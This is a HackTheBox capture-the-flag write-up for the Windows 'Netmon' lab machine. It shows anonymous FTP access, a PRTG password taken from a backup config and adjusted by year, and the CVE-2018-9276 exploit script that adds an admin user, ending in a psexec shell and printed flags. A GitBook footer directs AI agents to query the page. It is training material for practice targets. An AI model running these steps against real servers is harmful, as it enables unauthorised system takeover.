# Netmon - Easy ![Netmon](/files/ws2VqKqsjFxGvZDmPM5w) ## Introduction\@Netmon:\~$ | Name | [Netmon](https://app.hackthebox.com/machines/Netmon) | | ------------ | ---------------------------------------------------- | | IP | 10.10.10.152 | | Os | Window | | Points | 20 | | Difficulty | Easy | | Creator | [mrb3n](https://app.hackthebox.com/users/2984) | | Release Date | 02 March 2019 | ## Enumeration ### Nmap ```javascript # Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152 Nmap scan report for netmon.htb (10.10.10.152) Host is up (0.35s latency). Not shown: 995 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-02-19 11:18PM 1024 .rnd | 02-25-19 09:15PM inetpub | 07-16-16 08:18AM PerfLogs | 02-25-19 09:56PM Program Files | 02-02-19 11:28PM Program Files (x86) | 02-03-19 07:08AM Users |_02-25-19 10:49PM Windows 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm |_http-server-header: PRTG/18.1.37.13946 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2021-12-23T09:37:47 |_ start_date: 2021-12-23T09:36:30 |_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds ``` `FTP` can login with `Anonymous` ```javascript ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ ftp 10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:sheinn101): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-02-19 11:18PM 1024 .rnd 02-25-19 09:15PM inetpub 07-16-16 08:18AM PerfLogs 02-25-19 09:56PM Program Files 02-02-19 11:28PM Program Files (x86) 02-03-19 07:08AM Users 12-23-21 05:20AM Windows 226 Transfer complete. ftp> ``` It seem like ftp root directory is `c:\` ### Getting User.txt ```javascript ftp> cd users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-25-19 10:44PM Administrator 12-23-21 05:13AM Public 226 Transfer complete. ftp> cd Public 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 07:05AM Documents 07-16-16 08:18AM Downloads 07-16-16 08:18AM Music 07-16-16 08:18AM Pictures 12-23-21 05:18AM 94 tester.txt 12-23-21 04:37AM 34 user.txt 07-16-16 08:18AM Videos 226 Transfer complete. ftp> get user.txt local: user.txt remote: user.txt 200 PORT command successful. 150 Opening ASCII mode data connection. 226 Transfer complete. 34 bytes received in 0.33 secs (0.0999 kB/s) ftp> exit 221 Goodbye. ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ cat user.txt f876bb779c4439a08f27e9b0404e6fb5 ``` We can easily get user flag with ftp anonymous. ### Web ![](/files/0LDsKgtWVyHjXF98P9Kz) It `PRTG Network Monitor (NETMON)` page and we should try default credential which is `prtgadmin:prtgadmin` . But it doesn't work in here. We need to search the credential in `FTP` login. After poke around, found `PRTG Network Configuration File` in this location `\ProgramData\Paessler\PRTG Network Monitor`. ```javascript ftp> cd "\ProgramData\Paessler\PRTG Network Monitor" 250 CWD command successful. ftp> ls -al 200 PORT command successful. 150 Opening ASCII mode data connection. 12-15-21 07:23AM Configuration Auto-Backups 12-23-21 04:36AM Log Database 02-02-19 11:18PM Logs (Debug) 02-02-19 11:18PM Logs (Sensors) 02-02-19 11:18PM Logs (System) 12-23-21 04:36AM Logs (Web Server) 12-23-21 04:42AM Monitoring Database 02-25-19 09:54PM 1189697 PRTG Configuration.dat 02-25-19 09:54PM 1189697 PRTG Configuration.old 07-14-18 02:13AM 1153755 PRTG Configuration.old.bak 12-23-21 05:18AM 1671248 PRTG Graph Data Cache.dat 02-25-19 10:00PM Report PDFs 02-02-19 11:18PM System Information Database 02-02-19 11:40PM Ticket Database 02-02-19 11:18PM ToDo Database 226 Transfer complete. ftp> get "PRTG Configuration.old.bak" ``` ![](/files/U9shcZLUd3cNgFEn6QNu) ```javascript PrTg@dmin2018 ``` Let's try with this credentials in Login Page. ![](/files/gcbPDtLtCjDUqqJBH02m) But it doesn't work, if we look again password structure `PrTg@dmin2018` .It end with `2018` and the configuration file is also a backup file. So we should change that year in password. I tried it with `PrTg@dmin2019` and It was worked. ![](/files/KVxsAHSw2sh45C0iVhmS) ## Geting Administrator We can see version of that page on the left bottom and now we should try to search exploit for that. ![](/files/GjwHCYevS2bIL4grKZoi) We will use this [exploitdb](https://www.exploit-db.com/exploits/46527) bash script. > If we execute this bash script, you may get error like this ```javascript ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ ./46527.sh -bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ ``` Run the following command to fix that error. > sed -i -e 's/\r$//' 46527.sh ```javascript ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ ./46527.sh [+]#########################################################################[+] [*] Authenticated PRTG network Monitor remote code execution [*] [+]#########################################################################[+] [*] Date: 11/03/2019 [*] [+]#########################################################################[+] [*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*] [+]#########################################################################[+] [*] Vendor Homepage: https://www.paessler.com/prtg [*] [*] Version: 18.2.38 [*] [*] CVE: CVE-2018-9276 [*] [*] Reference: https://www.codewatch.org/blog/?p=453 [*] [+]#########################################################################[+] # login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script. # run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' [+]#########################################################################[+] EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" ``` We need to get `cookie` using burp to run this script. ![](/files/pTRnYSubWpFAUWVs0qdd) ```javascript ./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D" ``` ![](/files/zS28VghirEQ8eXXLUppu) Now we created a new user with this credential `pentest:P3nT3st!` Login with `psexec.py` ```javascript ┌─[sheinn101@parrot]─[~/htb/oscp/netmon] └──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.152..... [*] Found writable share ADMIN$ [*] Uploading file xHANHcvF.exe [*] Opening SVCManager on 10.10.10.152..... [*] Creating service KSTQ on 10.10.10.152..... [*] Starting service KSTQ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd c:\users\administrator\desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 0EF5-E5E5 Directory of c:\Users\Administrator\Desktop 02/02/2019 11:35 PM . t02/02/2019 11:35 PM .. yp12/23/2021 04:37 AM 34 root.txte 1 File(s) 34 bytes ro 2 Dir(s) 6,758,518,784 bytes free ot .c:\Users\Administrator\Desktop>type root.txt 52a75d9617892bb0d16e610dbf2e8787 ``` ![](/files/UMswqkJjkI4wMFflqvdz) > ## Resources > > > --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l33t-en0ugh.gitbook.io/infosec/hackthebox/netmon-easy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.